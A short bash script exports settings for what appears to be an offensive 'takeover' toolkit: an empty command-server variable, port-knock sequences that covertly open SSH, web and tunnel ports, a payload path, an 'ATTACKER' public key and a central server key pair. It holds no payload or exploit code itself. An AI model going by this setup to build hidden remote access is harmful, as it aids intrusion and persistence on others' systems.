#!/bin/bash

# Change this for security
export C_SERVER=
export KNOCK_OPEN_SSH="11110 22220"
export KNOCK_CLOSE_SSH="11111 22221"
export KNOCK_OPEN_HTTP="11112 22222"
export KNOCK_OPEN_HTTPS="11113 22223"
export KNOCK_OPEN_TUNNEL="11114 22224"
export KNOCK_DELAY=50
export SERVER_TUNNEL_PORT=9999

# This is for knockd format
export KNOCK_OPEN_SSH_D=$(echo $KNOCK_OPEN_SSH | tr ' ' ',')
export KNOCK_CLOSE_SSH_D=$(echo $KNOCK_CLOSE_SSH | tr ' ' ',')
export KNOCK_OPEN_HTTP_D=$(echo $KNOCK_OPEN_HTTP | tr ' ' ',')
export KNOCK_OPEN_HTTPS_D=$(echo $KNOCK_OPEN_HTTPS | tr ' ' ',')
export KNOCK_OPEN_TUNNEL_D=$(echo $KNOCK_OPEN_TUNNEL | tr ' ' ',')

# Server specific
export PAYLOAD_PATH="takeover/payload/payload.sh"

# Files
export ATTACKER_PUBLIC_KEY=$(cat ssh/ATTACKER.pub)
export SERVER_PUBLIC_KEY=$(cat ssh/CENTRAL.pub)
export SERVER_PRIVATE_KEY=$(cat ssh/CENTRAL)
export KNOCKD_CONF=$(envsubst < setup_takeover/knockd.conf)
export KNOCKD_CONF2=$(cat setup_takeover/knockd)
